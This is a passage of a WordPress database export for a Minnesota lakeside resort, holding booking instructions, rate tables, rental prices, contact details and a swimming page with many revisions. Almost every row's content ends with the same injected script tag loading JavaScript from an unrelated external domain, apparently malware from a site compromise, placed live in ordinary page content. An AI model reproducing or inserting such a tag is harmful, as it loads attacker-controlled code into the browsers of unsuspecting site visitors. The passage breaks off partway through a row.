data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" ><h3 class=\"widget-title\">CALL FOR AVAILABILITY 218-747-2959.</h3>			<div class=\"textwidget\">Book your stay by calling (218) 747-2959. The calendar is up to date showing availability. You can also send a request for booking by filling out form on right and selecting the days you wish to stay in the calendar on the right.\nWe will call you to confirm Reservation.\nRemember that a deposit is required before a booking can be confirmed. Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.\n\n</div>\n		</div></div><div id=\"pgc-88-0-1\"  class=\"panel-grid-cell\"  data-weight=\"0.227209944751\" ><div id=\"panel-88-0-1-0\" class=\"so-panel widget widget_bookingwidget panel-first-child panel-last-child\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\" >[siteorigin_widget class=\"BookingWidget\"]<input type=\"hidden\" value=\"{&quot;instance&quot;:{&quot;booking_widget_title&quot;:&quot;&quot;,&quot;booking_widget_show&quot;:&quot;booking_form&quot;,&quot;booking_widget_calendar_count&quot;:&quot;1&quot;,&quot;booking_widget_last_field&quot;:&quot;&quot;,&quot;booking_widget_type&quot;:&quot;&quot;,&quot;so_sidebar_emulator_id&quot;:&quot;bookingwidget-8810001&quot;,&quot;option_name&quot;:&quot;widget_bookingwidget&quot;},&quot;args&quot;:{&quot;before_widget&quot;:&quot;&lt;div id=\\&quot;panel-88-0-1-0\\&quot; class=\\&quot;so-panel widget widget_bookingwidget panel-first-child panel-last-child\\&quot; data-index=\\&quot;1\\&quot; data-style=\\&quot;{&amp;quot;background_image_attachment&amp;quot;:false,&amp;quot;background_display&amp;quot;:&amp;quot;tile&amp;quot;}\\&quot; &gt;&quot;,&quot;after_widget&quot;:&quot;&lt;\\/div&gt;&quot;,&quot;before_title&quot;:&quot;&lt;h3 class=\\&quot;widget-title\\&quot;&gt;&quot;,&quot;after_title&quot;:&quot;&lt;\\/h3&gt;&quot;,&quot;widget_id&quot;:&quot;widget-0-1-0&quot;}}\" />[/siteorigin_widget]</div></div></div></div><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','publish','closed','closed','','calendar','','','2019-06-16 20:29:24','2019-06-17 01:29:24','',0,'http://ashbyresort.com/?page_id=88',0,'page','',0),(89,1,'2016-03-12 19:40:16','2016-03-13 01:40:16','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Request a Booking','','publish','closed','closed','','89','','','2019-06-16 20:42:00','2019-06-17 01:42:00','',0,'http://ashbyresort.com/2016/03/12/89/',18,'nav_menu_item','',0),(90,1,'2016-03-12 19:40:16','2016-03-13 01:40:16','Book your stay\r\n\r\n[wpdevart_booking_calendar id=\"1\"]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Calendar','','inherit','closed','closed','','88-revision-v1','','','2016-03-12 19:40:16','2016-03-13 01:40:16','',88,'http://ashbyresort.com/2016/03/12/88-revision-v1/',0,'revision','',0),(91,1,'2016-03-12 19:46:41','2016-03-13 01:46:41','[table caption=\"Just test table\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nno,head1,head2,head3,head4\r\n1,row1col1,row1col2,row1col3,100\r\n2,row2col1,row2col2,row2col3,20000\r\n3,row3col1,,row3col3,1405\r\n4,row4col1,row4col2,row4col3,23023\r\n[/table]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 19:46:41','2016-03-13 01:46:41','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(92,1,'2016-03-12 19:49:39','2016-03-13 01:49:39','<p><a href=\"http://ashbyresort.com/calendar/\">Click here to book online</a></p><p>[wpforms id=\"613\"]</p><p>Email us at theashbyresort@gmail.com or call us at 218-747-2959</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Contact Us','','publish','closed','closed','','contact-us','','','2019-06-14 07:28:52','2019-06-14 12:28:52','',0,'http://ashbyresort.com/?page_id=92',0,'page','',0),(93,1,'2016-03-12 19:49:39','2016-03-13 01:49:39',' <script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','','','publish','closed','closed','','93','','','2019-06-16 20:42:00','2019-06-17 01:42:00','',0,'http://ashbyresort.com/2016/03/12/93/',19,'nav_menu_item','',0),(94,1,'2016-03-12 19:49:39','2016-03-13 01:49:39','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Contact Us','','inherit','closed','closed','','92-revision-v1','','','2016-03-12 19:49:39','2016-03-13 01:49:39','',92,'http://ashbyresort.com/2016/03/12/92-revision-v1/',0,'revision','',0),(95,1,'2016-03-12 19:57:34','2016-03-13 01:57:34','[Contact_Form_Builder id=\"10\"]<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Contact Us','','inherit','closed','closed','','92-revision-v1','','','2016-03-12 19:57:34','2016-03-13 01:57:34','',92,'http://ashbyresort.com/2016/03/12/92-revision-v1/',0,'revision','',0),(97,1,'2016-03-12 20:10:12','2016-03-13 02:10:12','[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10, #11, #12),2,$160.00,$200.00,$850.00,$1,000.00,8\r\nNew Cabins (#13, #14),2,$185.00,$225.00,$950.00,$1,100.00,8\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:10:12','2016-03-13 02:10:12','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(98,1,'2016-03-12 20:11:25','2016-03-13 02:11:25','[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,$1,000.00,8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,$1,100.00,8\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:11:25','2016-03-13 02:11:25','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(99,1,'2016-03-12 20:12:31','2016-03-13 02:12:31','[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:12:31','2016-03-13 02:12:31','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(101,1,'2016-03-12 20:16:48','2016-03-13 02:16:48','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\r\n\r\nWireless Internet Available </span>\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking\r\n\r\n&nbsp;\r\n<p class=\"resbody\"><b>Prices shown are for groups of 4 or less\r\n</b><b>All Daytime (Not Overnight) Guests $5.00 each\r\nPrices shown are for groups of 4 or less.\r\nMax Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</b>\r\n\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}</p>\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.\r\n\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.</p>\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!\r\n\r\n\r\nMOTEL OPEN YEAR ROUND.\r\nCALL FOR WINTER RATES</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:16:48','2016-03-13 02:16:48','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(102,1,'2016-03-12 20:25:19','2016-03-13 02:25:19','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p class=\"resbody\"><b>Prices shown are for groups of 4 or less\r\n</b><b>All Daytime (Not Overnight) Guests $5.00 each\r\nPrices shown are for groups of 4 or less.\r\nMax Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</b></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\nMOTEL OPEN YEAR ROUND.\r\nCALL FOR WINTER RATES<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:25:19','2016-03-13 02:25:19','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(103,1,'2016-03-12 20:27:07','2016-03-13 02:27:07','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:27:07','2016-03-13 02:27:07','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(104,1,'2016-03-12 20:35:20','2016-03-13 02:35:20','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2016 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2016,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$70.00,$85.00,$425.00,$490.00,4\r\nKitchenettes Motel,1,$90.00,$125.00,$525.00,$625.00,4\r\nSuite 9,2,$160.00,$200.00,$850.00,$950.00,4\r\nCabins (#10 #11 #12),2,$160.00,$200.00,$850.00,\"$1,000.00\",8\r\nNew Cabins (#13 #14),2,$185.00,$225.00,$950.00,\"$1,100.00\",8\r\nTents 1 per site w/ hook up, ,$25.00,$30.00,$130.00,\"$1300.00\",8\r\nRV Camping 1 Vehicle per site,,$34.00,$40.00,$200.00,\"$200.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong> Prices shown are for groups of 4 or less.</strong>\r\n<strong> Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nTHERE IS A PET FEE OF $5.00/DAY\r\nPETS MUST BE LEASHED AND PICKED UP AFTER.\r\nYOU ARE RESPONSIBLE FOR ANY DAMAGE CAUSED BY THEM.\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Boat,$20.00,$100.00,\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n15 H.P. Motor,$30.00,$150.00,Plus Gas\r\n16\' Pontoon with 25 H.P. Motor,$115.00,$400.00,Plus Gas\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2016-03-12 20:35:20','2016-03-13 02:35:20','',43,'http://ashbyresort.com/2016/03/12/43-revision-v1/',0,'revision','',0),(105,1,'2016-03-12 20:39:27','2016-03-13 02:39:27','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','2008 088','','inherit','open','closed','','2008-088','','','2016-03-12 20:39:27','2016-03-13 02:39:27','',81,'http://ashbyresort.com/wp-content/uploads/2016/03/2008-088.jpg',0,'attachment','image/jpeg',0),(106,1,'2016-03-12 20:39:37','2016-03-13 02:39:37','<img class=\"alignnone size-medium wp-image-105\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/2008-088-300x225.jpg\" alt=\"2008 088\" width=\"300\" height=\"225\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Fishing','','inherit','closed','closed','','81-revision-v1','','','2016-03-12 20:39:37','2016-03-13 02:39:37','',81,'http://ashbyresort.com/2016/03/12/81-revision-v1/',0,'revision','',0),(107,1,'2016-03-12 20:40:21','2016-03-13 02:40:21','<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/Fall-Frenzy-001-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSCN3833-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN2724.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-1024x683.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-1024x683.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-300x200.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-768x512.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/IMG_7500-272x182.jpg 272w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760-768x576.jpg 768w, http://ashbyresort.com/wp-content/uploads/2016/03/DSCN3760.jpg 1280w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/ashleyslide-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"720\" height=\"540\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-1024x768.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-1024x768.jpg 1024w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-300x225.jpg 300w, http://ashbyresort.com/wp-content/uploads/2017/01/DSC03045-768x576.jpg 768w\" sizes=\"(max-width: 720px) 100vw, 720px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Walleye11-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-124-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-107-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-092-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n										<img width=\"640\" height=\"480\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106.jpg\" alt=\"\" srcset=\"http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106.jpg 640w, http://ashbyresort.com/wp-content/uploads/2017/01/Carly-106-300x225.jpg 300w\" sizes=\"(max-width: 640px) 100vw, 640px\" />											\n		<p>A great way to spend a hot sunny day is on our sandy beach. The beach is shallow and has a slide in the water. <br />For those that like to hang out in deeper water there is a floating raft. <br />Pelican Lake is a 4,000 acre lake but is also a shallow lake and warms up quite early making it a great place to swim all summer.</p><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','publish','closed','closed','','swimming','','','2019-04-10 20:22:51','2019-04-11 01:22:51','',0,'http://ashbyresort.com/?page_id=107',0,'page','',0),(108,1,'2016-03-12 20:40:21','2016-03-13 02:40:21',' <script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','','','publish','closed','closed','','108','','','2019-06-16 20:42:00','2019-06-17 01:42:00','',0,'http://ashbyresort.com/2016/03/12/108/',12,'nav_menu_item','',0),(109,1,'2016-03-12 20:40:21','2016-03-13 02:40:21','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-revision-v1','','','2016-03-12 20:40:21','2016-03-13 02:40:21','',107,'http://ashbyresort.com/2016/03/12/107-revision-v1/',0,'revision','',0),(110,1,'2016-03-12 20:40:29','2016-03-13 02:40:29','<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Carly 152','','inherit','open','closed','','carly-152','','','2016-03-12 20:40:29','2016-03-13 02:40:29','',107,'http://ashbyresort.com/wp-content/uploads/2016/03/Carly-152.jpg',0,'attachment','image/jpeg',0),(111,1,'2016-03-12 20:40:46','2016-03-13 02:40:46','<img class=\"alignnone size-medium wp-image-110\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/Carly-152-300x225.jpg\" alt=\"Carly 152\" width=\"300\" height=\"225\" /><script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Swimming','','inherit','closed','closed','','107-revision-v1','','','2016-03-12 20:40:46','2016-03-13 02:40:46','',107,'http://ashbyresort.com/2016/03/12/107-revision-v1/',0,'revision','',0),(112,1,'2016-03-12 20:41:53','2016-03-13 02:41:53','<script 